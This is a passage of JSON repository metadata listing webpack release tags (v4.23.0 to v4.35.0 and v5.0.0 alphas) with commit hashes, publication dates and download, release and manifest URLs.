odeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repo